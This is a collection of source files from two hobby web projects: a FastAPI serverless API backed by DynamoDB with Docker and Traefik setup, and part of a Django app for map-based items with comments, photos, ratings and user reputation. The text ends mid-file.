"text": "FROM tiangolo/uvicorn-gunicorn-fastapi:python3.8\r\n\r\nCOPY ./requirements.txt requirements.txt\r\n\r\nRUN pip install -r requirements.txt \r\n\r\nCOPY ./log_cfg.py log_cfg.py\r\nCOPY ./app /app/app"
},
{
"alpha_fraction": 0.7027431130409241,
"alphanum_fraction": 0.7187032699584961,
"avg_line_length": 25.12162208557129,
"blob_id": "7e907a10fc3d021c013d6e33c9542a8204c5a749",
"content_id": "e365bb180bf6e24c07c2ea30654f2091255c87f7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2005,
"license_type": "no_license",
"max_line_length": 142,
"num_lines": 74,
"path": "/README.md",
"repo_name": "benlau6/fastapi-pynamodb-lambda-versioning",
"src_encoding": "UTF-8",
"text": "### This repository has a complexer app folder structure for bigger application and easier management.\r\n\r\n# Serverless REST API\r\nThis demonstrates how to setup a [RESTful Web Service](https://en.wikipedia.org/wiki/Representational_state_transfer#Applied_to_web_services) \r\n\r\n### API GW Integration model\r\nAll methods use `lambda-proxy` integration as that reduces the API GW interference in the payload.\r\n### Logging\r\nThe log_cfg.py is an alternate way to setup the python logging to be more friendly wth AWS lambda.\r\nThe lambda default logging config is to not print any source file or line number which makes it harder to correleate with the source.\r\n\r\nAdding the import:\r\n```python\r\n from log_cfg import logger\r\n```\r\nat the start of every event handler ensures that the format of the log messages are consistent, customizable and all in one place. \r\n\r\nDefault format uses:\r\n```python\r\n'%(asctime)-15s %(process)d-%(thread)d %(name)s [%(filename)s:%(lineno)d] :%(levelname)8s: %(message)s'\r\n```\r\n\r\n## Setup\r\n\r\nDownload node.js LTS version from https://nodejs.org/en/ \\\r\nInstall node.js and restart terminal if it is opened \\\r\nThen run commands below:\r\n\r\n```bash\r\nnpm install -g serverless\r\n\r\ngit clone https://github.com/benlau6/fastapi-pynamodb-lambda-version.git\r\ncd ./fastapi-pynamodb-lambda-version\r\n\r\nnpm install\r\n```\r\n\r\n## Deploy\r\n\r\nIn order to deploy the endpoint simply run\r\n\r\n```bash\r\nsls deploy\r\n```\r\n\r\n### Function update\r\n\r\nIn order to update the function run\r\n\r\n```bash\r\nsls deploy -f $function\r\n```\r\n\r\n### Function local test\r\n\r\nIn order to test the function locally, create a event.json in examples folder, then run\r\n\r\n```bash\r\naws invoke -f $function -p examples/event.json\r\n```\r\n\r\n## Docker\r\n\r\nIn order to run it locally, run the script below:\r\n\r\n```bash\r\ndocker-compose up\r\n```\r\n\r\nThen go to \r\n1. 127.0.0.1/dev to see if the endpoint is accessible\r\n2. 127.0.0.1/dev/docs to see api documentation\r\n3. 127.0.0.1/dev/items to query dynamoDB\r\n4. 127.0.0.1/dev/graphql to explore graphql"
},
{
"alpha_fraction": 0.8235294222831726,
"alphanum_fraction": 0.8235294222831726,
"avg_line_length": 68,
"blob_id": "da54b85170a118014071b4816ec40836993d4372",
"content_id": "3e2ddd573cf68555fdbbc4d7c013ffb7c7ac1e32",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 68,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 1,
"path": "/app/schemas/__init__.py",
"repo_name": "benlau6/fastapi-pynamodb-lambda-versioning",
"src_encoding": "UTF-8",
"text": "from .item import ItemIn, ItemOut, ItemOutAntd, ItemSort, ItemUpdate"
},
{
"alpha_fraction": 0.6218527555465698,
"alphanum_fraction": 0.6223278045654297,
"avg_line_length": 23.987653732299805,
"blob_id": "1bb01c027cdf03276e44546731d95851e21b0250",
"content_id": "bcd6a943505e802d6ce9fded96b19f0cc64d10bf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2105,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 81,
"path": "/app/routers/items.py",
"repo_name": "benlau6/fastapi-pynamodb-lambda-versioning",
"src_encoding": "UTF-8",
"text": "import http.client as httplib\r\nimport uuid\r\nfrom typing import List, Optional\r\n\r\nfrom fastapi import APIRouter\r\nfrom pydantic import BaseModel\r\nfrom pynamodb.exceptions import DeleteError, DoesNotExist\r\n\r\nfrom .db_model import ItemModel\r\nfrom .utils import get_updated_at\r\n\r\nrouter = APIRouter(\r\n prefix=\"/items\",\r\n tags=[\"items\"]\r\n)\r\n\r\n\r\nclass ItemBase(BaseModel):\r\n name: str\r\n image: str\r\n status: str\r\n created_at: str\r\n updated_at: str\r\n\r\nclass ItemIn(ItemBase):\r\n item_id: str = uuid.uuid4()\r\n\r\nclass ItemOut(ItemBase):\r\n item_id: str\r\n\r\nclass ItemOutAntd(BaseModel):\r\n data: List[ItemOut]\r\n\r\nclass ItemUpdate(BaseModel):\r\n status: str\r\n\r\nclass ItemSort(BaseModel):\r\n updated_at: str\r\n\r\n\r\[email protected](\"/{item_id}\", response_model=ItemOut)\r\ndef read_item(item_id: str, q: Optional[str] = None):\r\n item = ItemModel.get(item_id)\r\n return dict(item)\r\n\r\n\r\[email protected](\"/{item_id}\", response_model=ItemOut)\r\ndef update_item(item_id: str, new_item:ItemUpdate):\r\n item = ItemModel.get(item_id)\r\n item.update(\r\n actions=[\r\n ItemModel.status.set(new_item.status),\r\n ItemModel.updated_at.set(get_updated_at())\r\n ]\r\n )\r\n return dict(item)\r\n\r\n\r\[email protected](\"/\", response_model=ItemOutAntd)\r\ndef read_items(created_at: Optional[str] = None, updated_at: Optional[str] = None):\r\n items = ItemModel.scan()\r\n items = [dict(item) for item in items]\r\n \r\n if updated_at:\r\n if updated_at == 'ascend':\r\n items = sorted(items, key=lambda k: k['updated_at'])\r\n elif updated_at == 'descend':\r\n items = sorted(items, key=lambda k: k['updated_at'], reverse=True)\r\n elif created_at:\r\n if created_at == 'ascend':\r\n items = sorted(items, key=lambda k: k['created_at'])\r\n elif created_at == 'descend':\r\n items = sorted(items, key=lambda k: k['created_at'], reverse=True)\r\n\r\n return {'data': items}\r\n #return {'data': [dict(item) for item in items]}\r\n\r\n\r\[email protected](\"/\", response_model=ItemOut)\r\ndef insert_item(item: ItemIn):\r\n return item\r\n"
},
{
"alpha_fraction": 0.6993166208267212,
"alphanum_fraction": 0.7015945315361023,
"avg_line_length": 15.923076629638672,
"blob_id": "482cab4585fcfbc4fea9d8187ef08473d8c0c81d",
"content_id": "9371af2ad4b64d52898e45a95dd53dc2bf7b26e1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 439,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 26,
"path": "/app/schemas/item.py",
"repo_name": "benlau6/fastapi-pynamodb-lambda-versioning",
"src_encoding": "UTF-8",
"text": "import uuid\nfrom typing import List, Optional\n\nfrom pydantic import BaseModel\n\nclass ItemBase(BaseModel):\n name: str\n image: str\n status: str\n created_at: str\n updated_at: str\n\nclass ItemIn(ItemBase):\n item_id: str = uuid.uuid4()\n\nclass ItemOut(ItemBase):\n item_id: str\n\nclass ItemOutAntd(BaseModel):\n data: List[ItemOut]\n\nclass ItemUpdate(BaseModel):\n status: str\n\nclass ItemSort(BaseModel):\n updated_at: str"
},
{
"alpha_fraction": 0.800000011920929,
"alphanum_fraction": 0.800000011920929,
"avg_line_length": 70,
"blob_id": "5fcaa0e8c92cb973d9c48863402ad1b609c54f2f",
"content_id": "6a11af033b002463deb2e46fc606a0b7ebced134",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 70,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 1,
"path": "/examples/load_data.sh",
"repo_name": "benlau6/fastapi-pynamodb-lambda-versioning",
"src_encoding": "UTF-8",
"text": "aws dynamodb batch-write-item --request-items file://initial_data.json"
},
{
"alpha_fraction": 0.6469104886054993,
"alphanum_fraction": 0.6469104886054993,
"avg_line_length": 28.370370864868164,
"blob_id": "413e3a1eb085be8b6edb64d089a92352c2d3adf7",
"content_id": "6567b83b9ae7a1b6e497f407722c2bec4c7e8d0c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1586,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 54,
"path": "/app/api/v1/endpoints/items.py",
"repo_name": "benlau6/fastapi-pynamodb-lambda-versioning",
"src_encoding": "UTF-8",
"text": "import http.client as httplib\nimport uuid\nfrom typing import List, Optional\n\nfrom fastapi import APIRouter\nfrom pynamodb.exceptions import DeleteError, DoesNotExist\n\nfrom app import crud, schemas\nfrom app.utils import get_updated_at\n\n\n\nrouter = APIRouter()\n\[email protected](\"/{item_id}\", response_model=schemas.ItemOut)\ndef read_item(item_id: str, q: Optional[str] = None):\n item = crud.item.get(item_id)\n return dict(item)\n\n\[email protected](\"/{item_id}\", response_model=schemas.ItemOut)\ndef update_item(item_id: str, new_item:schemas.ItemUpdate):\n item = crud.item.get(item_id)\n item.update(\n actions=[\n crud.item.status.set(new_item.status),\n crud.item.updated_at.set(get_updated_at())\n ]\n )\n return dict(item)\n\n\[email protected](\"/\", response_model=schemas.ItemOutAntd)\ndef read_items(created_at: Optional[str] = None, updated_at: Optional[str] = None):\n items = crud.item.scan()\n items = [dict(item) for item in items]\n \n if updated_at:\n if updated_at == 'ascend':\n items = sorted(items, key=lambda k: k['updated_at'])\n elif updated_at == 'descend':\n items = sorted(items, key=lambda k: k['updated_at'], reverse=True)\n elif created_at:\n if created_at == 'ascend':\n items = sorted(items, key=lambda k: k['created_at'])\n elif created_at == 'descend':\n items = sorted(items, key=lambda k: k['created_at'], reverse=True)\n\n return {'data': items}\n\n\[email protected](\"/\", response_model=schemas.ItemOut)\ndef insert_item(item: schemas.ItemIn):\n return item\n"
},
{
"alpha_fraction": 0.7857142686843872,
"alphanum_fraction": 0.8095238208770752,
"avg_line_length": 6.800000190734863,
"blob_id": "536fa2fa12d55f8cc0f1e3beadd220ee08bc1f5b",
"content_id": "3ef31d3ede9fe6379abe32de4784db4b5abef0f6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 42,
"license_type": "no_license",
"max_line_length": 8,
"num_lines": 5,
"path": "/requirements.txt",
"repo_name": "benlau6/fastapi-pynamodb-lambda-versioning",
"src_encoding": "UTF-8",
"text": "pynamodb\r\nfastapi\r\nmangum\r\ngraphene\r\nboto3"
},
{
"alpha_fraction": 0.8148148059844971,
"alphanum_fraction": 0.8148148059844971,
"avg_line_length": 27,
"blob_id": "b981289efc4b41d505cf84d993b470e34031d5c3",
"content_id": "9fd35e8ed8a4941bfab3a37ce4239c6449fc8d75",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 27,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 1,
"path": "/app/crud/__init__.py",
"repo_name": "benlau6/fastapi-pynamodb-lambda-versioning",
"src_encoding": "UTF-8",
"text": "from .crud_item import item"
},
{
"alpha_fraction": 0.5992890000343323,
"alphanum_fraction": 0.6277298331260681,
"avg_line_length": 33.83636474609375,
"blob_id": "e3bc5eb058eeba46f6a14068b5387f495f169574",
"content_id": "942a5b159cddc8b2b71b404be1b82acb1dc44fd4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "YAML",
"length_bytes": 1969,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 55,
"path": "/docker-compose.yml",
"repo_name": "benlau6/fastapi-pynamodb-lambda-versioning",
"src_encoding": "UTF-8",
"text": "version: '3.8'\r\nservices:\r\n api:\r\n build: .\r\n # for direct entry: 127.0.0.1:3000\r\n ports:\r\n - 3000:3000\r\n env_file:\r\n - .env\r\n environment: \r\n # check for env: https://github.com/tiangolo/uvicorn-gunicorn-fastapi-docker\r\n - PORT=3000\r\n - LOG_LEVEL=debug\r\n labels:\r\n # Enable Traefik for this specific \"backend\" service\r\n - traefik.enable=true\r\n # Define the port inside of the Docker service to use (shd be same as env:PORT)\r\n - traefik.http.services.app.loadbalancer.server.port=3000\r\n # Make Traefik use this domain in HTTP\r\n - traefik.http.routers.app-http.entrypoints=http\r\n - traefik.http.routers.app-http.rule=Host(`127.0.0.1`) && PathPrefix(`/dev`)\r\n - traefik.http.middlewares.api-strip-prefix.stripprefix.prefixes=/dev\r\n - traefik.http.routers.app-http.middlewares=api-strip-prefix@docker\r\n reverse-proxy:\r\n image: traefik\r\n ports:\r\n # Listen on port 80, default for HTTP, necessary to redirect to HTTPS\r\n - 80:80\r\n - 8080:8080\r\n volumes:\r\n # Add Docker as a mounted volume, so that Traefik can read the labels of other services\r\n - \"/var/run/docker.sock:/var/run/docker.sock:ro\"\r\n command:\r\n # Enable Docker in Traefik, so that it reads labels from Docker services\r\n - --providers.docker\r\n # Do not expose all Docker services, only the ones explicitly exposed\r\n - --providers.docker.exposedbydefault=false\r\n # Create an entrypoint \"http\" listening on port 80\r\n - --entrypoints.http.address=:80\r\n # Enable the access log, with HTTP requests\r\n - --accesslog\r\n # Enable the Traefik log, for configurations and errors\r\n - --log\r\n # Enable the Dashboard and API\r\n #- --api\r\n - --api.insecure=true\r\n\r\n #nginx:\r\n # image: nginx:alpine\r\n # ports:\r\n # - 80:80\r\n # volumes:\r\n # - ./nginx/default.conf:/etc/nginx/conf.d/default.conf\r\n # depends_on:\r\n # - api"
},
{
"alpha_fraction": 0.6755994558334351,
"alphanum_fraction": 0.6812412142753601,
"avg_line_length": 21.700000762939453,
"blob_id": "b46afc74aba9cee5568eb22569f6208cb776cf45",
"content_id": "830badd66dc27a63e0cd9315f0c869c397fd4a93",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 709,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 30,
"path": "/app/main.py",
"repo_name": "benlau6/fastapi-pynamodb-lambda-versioning",
"src_encoding": "UTF-8",
"text": "from fastapi import FastAPI\r\nfrom fastapi.middleware.cors import CORSMiddleware\r\nfrom mangum import Mangum\r\n\r\nfrom .api.v1.api import router as api_v1_router\r\nfrom .api.graphql.api import router as gql_router\r\nfrom app.core.config import settings\r\n\r\nimport os\r\n\r\nSTAGE = os.environ['STAGE']\r\n\r\napp = FastAPI(root_path=f'/{STAGE}')\r\n\r\napp.add_middleware(\r\n CORSMiddleware,\r\n allow_origins=[\"*\"],\r\n allow_credentials=True,\r\n allow_methods=[\"*\"],\r\n allow_headers=[\"*\"],\r\n)\r\n\r\napp.include_router(api_v1_router, prefix=settings.API_V1_STR)\r\napp.include_router(gql_router, prefix='/graphql', tags=['graphql'])\r\n\r\[email protected](\"/\")\r\ndef read_root():\r\n return {\"Hello\": \"World\"}\r\n\r\nhandler = Mangum(app)"
},
{
"alpha_fraction": 0.6399317383766174,
"alphanum_fraction": 0.6433447003364563,
"avg_line_length": 35.446807861328125,
"blob_id": "341ad12b1695f8c3b81740296bdfdc4de70cb3fc",
"content_id": "0c15c79afd9b51c344378003b339357687c0785c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1758,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 47,
"path": "/app/routers/db_model.py",
"repo_name": "benlau6/fastapi-pynamodb-lambda-versioning",
"src_encoding": "UTF-8",
"text": "from datetime import datetime\r\nfrom datetime import timedelta\r\nfrom enum import Enum\r\nimport boto3\r\nimport json\r\nimport os\r\nfrom pynamodb.attributes import UnicodeAttribute, UTCDateTimeAttribute, ListAttribute\r\nfrom pynamodb.models import Model\r\nfrom log_cfg import logger\r\n\r\nclass State(Enum):\r\n \"\"\"\r\n Manage asset states in dynamo with a string field\r\n Could have used an int as well, or used a custom serializer which is a bit cleaner.\r\n \"\"\"\r\n undetermined = 1\r\n normal = 2\r\n fault = 3\r\n\r\nclass ItemModel(Model):\r\n class Meta:\r\n table_name = os.environ['DYNAMODB_TABLE']\r\n region = os.environ['REGION']\r\n billing_mode = 'PAY_PER_REQUEST'\r\n\r\n item_id = UnicodeAttribute(hash_key=True)\r\n name = UnicodeAttribute(null=False)\r\n image = UnicodeAttribute(null=False)\r\n status = UnicodeAttribute(null=False, default=State.undetermined.name)\r\n created_at = UnicodeAttribute(null=False, default=(datetime.now()+timedelta(hours=8)).strftime('%Y-%m-%d %H:%M:%S'))\r\n updated_at = UnicodeAttribute(null=False, default=(datetime.now()+timedelta(hours=8)).strftime('%Y-%m-%d %H:%M:%S'))\r\n\r\n def __str__(self):\r\n return 'item_id:{}, name:{}'.format(self.item_id, self.name)\r\n\r\n def __iter__(self):\r\n for name, attr in self._get_attributes().items():\r\n yield name, attr.serialize(getattr(self, name))\r\n\r\n def save(self, conditional_operator=None, **expected_values):\r\n try:\r\n self.update_at = datetime.now().astimezone()\r\n logger.debug('saving: {}'.format(self))\r\n super(AssetModel, self).save()\r\n except Exception as e:\r\n logger.error('save {} failed: {}'.format(self.item_id, e), exc_info=True)\r\n raise e"
},
{
"alpha_fraction": 0.7430939078330994,
"alphanum_fraction": 0.7430939078330994,
"avg_line_length": 44.375,
"blob_id": "3a040c3ace52f8be50e983fac8c3a80ab2efdf83",
"content_id": "a4fdbf7705108ae3974e4587ab2d87197d8b9304",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 362,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 8,
"path": "/app/api/v1/api.py",
"repo_name": "benlau6/fastapi-pynamodb-lambda-versioning",
"src_encoding": "UTF-8",
"text": "from fastapi import APIRouter\nfrom .endpoints import login, users, utils, items\n\nrouter = APIRouter()\n#router.include_router(login.router, tags=['login'])\nrouter.include_router(users.router, prefix='/users', tags=['users'])\n#router.include_router(utils.router, prefix='/utils', tags=['utils'])\nrouter.include_router(items.router, prefix='/items', tags=['items'])"
},
{
"alpha_fraction": 0.7037037014961243,
"alphanum_fraction": 0.7089946866035461,
"avg_line_length": 26.14285659790039,
"blob_id": "9d5db9bed23c9667cafd00ca0c1cabcd90ce8ccd",
"content_id": "5a33cf82301d31911b541658fd58255a543f50a1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 189,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 7,
"path": "/app/utils.py",
"repo_name": "benlau6/fastapi-pynamodb-lambda-versioning",
"src_encoding": "UTF-8",
"text": "from datetime import datetime, timedelta\nimport time\n\ndatetime_format = '%Y-%m-%d %H:%M:%S'\n\ndef get_updated_at():\n return (datetime.now() + timedelta(hours=8)).strftime(datetime_format)"
}
] | 15 |
BijoySingh/Project-Hermes-Django
|
https://github.com/BijoySingh/Project-Hermes-Django
|
7adaf6757bc605e9f3781d915c4250bcc348fb47
|
7cb50402e612ea287d5922a2716a30b7888a0d70
|
8a1cc9342312f794c48a857de1444a70491a75fa
|
refs/heads/master
| 2016-09-01T07:04:05.259487 | 2016-04-09T10:25:21 | 2016-04-09T10:25:21 | 55,672,434 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7377049326896667,
"alphanum_fraction": 0.7868852615356445,
"avg_line_length": 29.5,
"blob_id": "41ff5735a6c02489b861a8d4b6fe7a6b1f918554",
"content_id": "90085b5c4148565b6cd26f90ef4922fd464a7e75",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 61,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 2,
"path": "/project_hermes/hermes_config.py",
"repo_name": "BijoySingh/Project-Hermes-Django",
"src_encoding": "UTF-8",
"text": "\nclass Configurations:\n AUTO_VERIFICATION_REPUTATION = 500"
},
{
"alpha_fraction": 0.6984924674034119,
"alphanum_fraction": 0.6984924674034119,
"avg_line_length": 26.44827651977539,
"blob_id": "2144800d8fcec458abe686f8dab5297deb877026",
"content_id": "6d0f120c83410ffb372120fdb92117f26cefbc13",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 796,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 29,
"path": "/item/admin.py",
"repo_name": "BijoySingh/Project-Hermes-Django",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\n\n# Register your models here.\nfrom item.models import Item, Comment, Photo, Rating, Reaction\n\n\[email protected](Item)\nclass ItemAdmin(admin.ModelAdmin):\n list_display = ['id', 'title', 'latitude', 'longitude', 'rating', 'author']\n\n\[email protected](Comment)\nclass CommentAdmin(admin.ModelAdmin):\n list_display = ['id', 'comment', 'upvotes', 'downvotes', 'flags', 'author']\n\n\[email protected](Photo)\nclass PhotoAdmin(admin.ModelAdmin):\n list_display = ['id', 'picture', 'upvotes', 'downvotes', 'flags', 'author']\n\n\[email protected](Rating)\nclass RatingAdmin(admin.ModelAdmin):\n list_display = ['id', 'author', 'item', 'rating']\n\n\[email protected](Reaction)\nclass ReactionAdmin(admin.ModelAdmin):\n list_display = ['id', 'author', 'reactable', 'reaction']\n"
},
{
"alpha_fraction": 0.7599067687988281,
"alphanum_fraction": 0.7599067687988281,
"avg_line_length": 32,
"blob_id": "f7667c3d9a60ef2d5f46c4612aad7793623ee417",
"content_id": "8e571d42b620540839174c22788ab0adbb95fe4f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 429,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 13,
"path": "/account/serializers.py",
"repo_name": "BijoySingh/Project-Hermes-Django",
"src_encoding": "UTF-8",
"text": "from rest_framework import serializers\n\nfrom account.models import UserProfile\n\n\nclass UserProfileSerializer(serializers.ModelSerializer):\n username = serializers.CharField(source='user.username')\n first_name = serializers.CharField(source='user.first_name')\n last_name = serializers.CharField(source='user.last_name')\n email = serializers.EmailField(source='user.email')\n\n class Meta:\n model = UserProfile\n"
},
{
"alpha_fraction": 0.7886179089546204,
"alphanum_fraction": 0.792682945728302,
"avg_line_length": 45.85714340209961,
"blob_id": "076ab148f10e223c6bff25e1b974688e51eb83d8",
"content_id": "b4fe6bbdc0fe851464f58cdf4ebf3d95f4506f7c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 984,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 21,
"path": "/README.md",
"repo_name": "BijoySingh/Project-Hermes-Django",
"src_encoding": "UTF-8",
"text": "# Project Hermes\n\nThe project hermes for Imagine Cup, which allows for data collection for map based data\n\n## Setup (Before Installation)\n- Follow all steps mentioned in `INSTALLATION.md`\n- Edit `project_hermes/settings/conf.sample.py` to `project_hermes/settings/conf.py`\n\n## Setting up local machine for development\n- Use Python 3.5\n- Install and configure virtualenvwrapper https://virtualenvwrapper.readthedocs.org/en/latest/\n- In local machine use `pip install -r requirements/local.txt`\n- Edit `project_hermes/settings/conf.py` to your local settings\n\n## Setting up Production server\n- Use Python 3.5\n- Install and configure virtualenvwrapper https://virtualenvwrapper.readthedocs.org/en/latest/\n- In local machine use `pip install -r requirements/production.txt`\n- Edit `project_hermes/settings/conf.py` to add your production level settings\n- Set environment variable `DJANGO_SETTINGS_MODULE` to `project_hermes.settings.production`\n- Continue with Django deployment normally\n"
},
{
"alpha_fraction": 0.5972132682800293,
"alphanum_fraction": 0.6015352606773376,
"avg_line_length": 35.05116271972656,
"blob_id": "86c79c36760d2faf50aa41ba67034d2894ff46a8",
"content_id": "8d2d133bf48c5326345f7e823d1b9174908e75ab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 15502,
"license_type": "no_license",
"max_line_length": 148,
"num_lines": 430,
"path": "/item/views.py",
"repo_name": "BijoySingh/Project-Hermes-Django",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import get_object_or_404\n\n# Create your views here.\nfrom rest_framework import viewsets\nfrom rest_framework.decorators import list_route, detail_route\nfrom rest_framework.permissions import IsAuthenticatedOrReadOnly, IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework.status import HTTP_400_BAD_REQUEST, HTTP_403_FORBIDDEN\n\nfrom account.models import UserProfile\nfrom item.models import Item, Comment, Reaction, ReactionChoices, Photo, Rating, ItemStatusChoices\nfrom item.serializers import CreateItemSerializer, ItemSerializer, BoundingBoxSerializer, CommentSerializer, \\\n PhotoSerializer, UpdateItemSerializer, AddRatingSerializer, AddCommentSerializer, \\\n AddPhotoSerializer\nfrom project_hermes.hermes_config import Configurations\n\n\ndef get_author(user):\n return UserProfile.objects.filter(user=user).first()\n\ndef recalculate_reputation(profile: UserProfile):\n comments = Comment.objects.filter(author=profile)\n photos = Photo.objects.filter(author=profile)\n reactions = Reaction.objects.filter(author=profile).count()\n\n reputation = 0\n for comment in comments:\n reputation += comment.experience\n for photo in photos:\n reputation += photo.experience\n reputation += reactions\n\n items = Item.objects.filter(author=profile)\n for item in items:\n reputation += item.rating * 2\n reputation -= item.flags * 10\n\n profile.reputation = reputation\n profile.save()\n\nclass ItemViewSet(viewsets.ModelViewSet):\n queryset = Item.objects.all()\n serializer_class = ItemSerializer\n permission_classes = [IsAuthenticatedOrReadOnly]\n\n @staticmethod\n def is_valid_location(latitude, longitude):\n return -90.0 <= latitude <= 90.0 and -180.0 <= longitude <= 180.0\n\n def create(self, request, *args, **kwargs):\n \"\"\"\n create the item\n ---\n request_serializer: CreateItemSerializer\n \"\"\"\n\n serialized_data = CreateItemSerializer(data=request.data)\n if serialized_data.is_valid():\n latitude = serialized_data.validated_data['latitude']\n longitude = serialized_data.validated_data['longitude']\n\n if not self.is_valid_location(latitude, longitude):\n return Response({'success': False, 'message': 'Incorrect Location'}, status=HTTP_400_BAD_REQUEST)\n\n item = Item.objects.filter(author__user=request.user, longitude=longitude, latitude=latitude).first()\n author = get_author(request.user)\n status = ItemStatusChoices.UNVERIFIED if author.reputation < Configurations.AUTO_VERIFICATION_REPUTATION else ItemStatusChoices.VERIFIED\n if not item:\n item = Item.objects.create(\n latitude=latitude,\n longitude=longitude,\n title=serialized_data.validated_data['title'],\n description=serialized_data.validated_data['description'],\n author=author,\n status=status,\n )\n recalculate_reputation(author)\n return Response(self.serializer_class(item).data)\n else:\n return Response({'success': False, 'message': 'Incorrect Data Sent'}, status=HTTP_400_BAD_REQUEST)\n\n @list_route(methods=['POST'], permission_classes=[])\n def search_bounding_box(self, request):\n \"\"\"\n Get items by Bounding Box\n ---\n request_serializer: BoundingBoxSerializer\n \"\"\"\n\n serialized_data = BoundingBoxSerializer(data=request.data)\n\n if serialized_data.is_valid():\n min_latitude = serialized_data.validated_data['min_latitude']\n max_latitude = serialized_data.validated_data['max_latitude']\n min_longitude = serialized_data.validated_data['min_longitude']\n max_longitude = serialized_data.validated_data['max_longitude']\n\n items = self.get_queryset().filter(latitude__range=[min_latitude, max_latitude],\n longitude__range=[min_longitude, max_longitude])\n response = {\n 'results': self.serializer_class(items, many=True).data\n }\n return Response(response)\n else:\n return Response({'success': False, 'message': 'Incorrect Data Sent'}, status=HTTP_400_BAD_REQUEST)\n\n @detail_route(permission_classes=[IsAuthenticated])\n def get_user_comment(self, request, pk):\n item = get_object_or_404(Item, pk=pk)\n comment = Comment.objects.filter(author__user=request.user, item=item).first()\n if comment:\n response = {\n 'success': True,\n 'result': CommentSerializer(comment).data\n }\n return Response(response)\n else:\n return Response({'success': False})\n\n @detail_route()\n def get_comments(self, request, pk):\n item = get_object_or_404(Item, pk=pk)\n comments = item.comments.all()\n response = {\n 'results': CommentSerializer(comments, many=True).data\n }\n return Response(response)\n\n @detail_route()\n def get_photos(self, request, pk):\n item = get_object_or_404(Item, pk=pk)\n photos = item.photos.all()\n response = {\n 'results': PhotoSerializer(photos, many=True).data\n }\n return Response(response)\n\n def update(self, request, *args, **kwargs):\n \"\"\"\n update the item\n ---\n request_serializer: UpdateItemSerializer\n \"\"\"\n\n serialized_data = UpdateItemSerializer(data=request.data)\n item = self.get_object()\n if item.author.user != request.user:\n return Response({'success': False, 'message': 'Unauthorized Access'}, status=HTTP_403_FORBIDDEN)\n\n if serialized_data.is_valid():\n item.title = serialized_data.validated_data['title']\n item.description = serialized_data.validated_data['description']\n item.save()\n recalculate_reputation(item.author)\n return Response(self.serializer_class(item).data)\n else:\n return Response({'success': False, 'message': 'Incorrect Data Sent'}, status=HTTP_400_BAD_REQUEST)\n\n @detail_route(methods=['POST'], permission_classes=[IsAuthenticated])\n def add_rating(self, request, pk):\n \"\"\"\n Set rating of the item\n ---\n request_serializer: AddRatingSerializer\n \"\"\"\n\n item = self.get_object()\n serialized_data = AddRatingSerializer(data=request.data)\n if serialized_data.is_valid():\n\n if not (0.0 <= serialized_data.validated_data['rating'] <= 5.0):\n return Response({'success': False, 'message': 'Incorrect Rating'}, status=HTTP_400_BAD_REQUEST)\n\n rating = Rating.objects.filter(item=item, author__user=request.user).first()\n if rating:\n rating.rating = serialized_data.validated_data['rating']\n rating.save()\n\n item.recalculate_rating()\n item.save()\n else:\n rating = Rating.objects.create(\n rating=serialized_data.validated_data['rating'],\n item=item,\n author=get_author(request.user),\n )\n\n item.recalculate_rating()\n item.save()\n recalculate_reputation(rating.author)\n response = {\n 'success': True,\n 'result': self.serializer_class(item).data\n }\n return Response(response)\n else:\n return Response({'success': False, 'message': 'Incorrect Data Sent'}, status=HTTP_400_BAD_REQUEST)\n\n @detail_route(methods=['POST'], permission_classes=[IsAuthenticated])\n def add_comment(self, request, pk):\n \"\"\"\n add comment of the item\n ---\n request_serializer: AddCommentSerializer\n \"\"\"\n\n item = self.get_object()\n serialized_data = AddCommentSerializer(data=request.data)\n if serialized_data.is_valid():\n comment = Comment.objects.filter(item=item, author__user=request.user).first()\n if comment:\n comment.description = serialized_data.validated_data['description']\n comment.save()\n else:\n comment = Comment.objects.create(\n description=serialized_data.validated_data['description'],\n item=item,\n author=get_author(request.user),\n )\n response = {\n 'success': True,\n 'result': CommentSerializer(comment).data\n }\n recalculate_reputation(comment.author)\n return Response(response)\n else:\n return Response({'success': False, 'message': 